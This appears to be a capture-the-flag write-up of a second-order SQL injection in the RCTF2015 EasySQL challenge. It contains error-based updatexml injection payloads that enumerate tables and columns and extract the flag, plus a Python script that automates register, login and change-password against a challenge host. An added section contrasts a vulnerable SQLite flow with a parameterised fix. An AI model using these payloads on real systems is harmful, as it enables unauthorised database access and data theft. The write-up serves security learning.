[RCTF2015]EasySQL
Open the target machine; the interface is as follows:
On the registration page I started with the username and email fields, fuzzing them directly to see which characters are filtered. After registering successfully there is a change-password function, so the point of this challenge should be second-order injection.
Special characters are handled when the data is stored in the database, but the change-password code reads the username back out of the database and uses it without any further processing.
Register a user with the name:
'sss"\
From the error echoed on the change-password page, the SQL statement can be guessed to look something like this:
select * from user where username="'sss"\" and password='d41d8cd98f00b204e9800998ecf8427e'
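The second-order flaw behind that error, as an added example that is not part of the original writeup or the challenge's code: a constructed SQLite stand-in for the register / change-password flow that stores the name safely but splices it back into the query unescaped, next to the parameterised fix. Table and column names, the email value and the in-memory database are assumptions.

```python
import hashlib
import sqlite3

# Constructed stand-in for the challenge (not its real code): the registration
# name from the writeup, 'sss"\ , and an empty old password whose MD5 is d41d8...
USERNAME = '\'sss"\\'

def md5(text):
    return hashlib.md5(text.encode()).hexdigest()

def setup_db():
    con = sqlite3.connect(":memory:")
    con.execute("create table users (username text, password text, email text)")
    return con

def register(con, username, password):
    # Registration is parameterised: the quote and backslash are stored verbatim
    # and harmlessly. This is the "handled when stored" half of the writeup.
    con.execute("insert into users values (?, ?, ?)",
                (username, md5(password), "constructed@example.invalid"))
    con.commit()

def load_username(con, username):
    # The application reading the logged-in user's name back from the database.
    return con.execute("select username from users where username = ?",
                       (username,)).fetchone()[0]

def change_password_vulnerable(con, username, old_password):
    # Second-order injection: the stored name is trusted because it "came from
    # the database" and is spliced in unescaped, reproducing the guessed query
    #   select * from users where username="'sss"\" and password='d41d8...'
    stored = load_username(con, username)
    query = "select * from users where username=\"%s\" and password='%s'" % (
        stored, md5(old_password))
    return con.execute(query).fetchone()

def change_password_fixed(con, username, old_password):
    # Hardened form: a value read back from the database is still data,
    # so it is bound as a parameter exactly like the user-supplied password.
    stored = load_username(con, username)
    return con.execute("select * from users where username=? and password=?",
                       (stored, md5(old_password))).fetchone()

def demo():
    con = setup_db()
    register(con, USERNAME, "")
    try:
        change_password_vulnerable(con, USERNAME, "")
        vulnerable_error = None
    except sqlite3.Error as exc:
        vulnerable_error = str(exc)  # the stored " and \ break the query
    fixed_row = change_password_fixed(con, USERNAME, "")
    return {"stored_intact": load_username(con, USERNAME) == USERNAME,
            "vulnerable_error": vulnerable_error,
            "fixed_user": fixed_row[0] if fixed_row else None}
```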
username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#
After testing, the flag is not in the flag table.
username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#
It turned out that the output has a length restriction, so narrow the result down with regexp:
username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&(column_name)regexp('^r'))),1))#
username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#
Here it gets awkward: the output is still cut off, so it is better to reverse the output:
username=peri0d"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('f'))),1))#
Finally, a script that covers the whole process of this challenge, and also a record of my own silly mistakes:
import requests

url_reg = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/register.php'
url_log = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/login.php'
url_change = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/changepwd.php'

# prefix closes the stored username's double quote; suffix closes the injected expression
pre = 'peri0d"'
suf = "'))),1))#"
s = list('abcdefghijklmnopqrstuvwxyz1234567890')

r = requests.session()


def register(name):
    data = {
        'username': name,
        'password': '123',
        'email': '123',
    }
    r.post(url=url_reg, data=data)


def login(name):
    data = {
        'username': name,
        'password': '123',
    }
    r.post(url=url_log, data=data)


def changepwd():
    # the stored username is read back and used in the query here,
    # so the error echoed by this page carries the result
    data = {
        'oldpass': '',
        'newpass': '',
    }
    kk = r.post(url=url_change, data=data)
    if 'target' not in kk.text:
        print(kk.text)


for i in s:
    payload = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
    register(payload)
    login(payload)
    changepwd()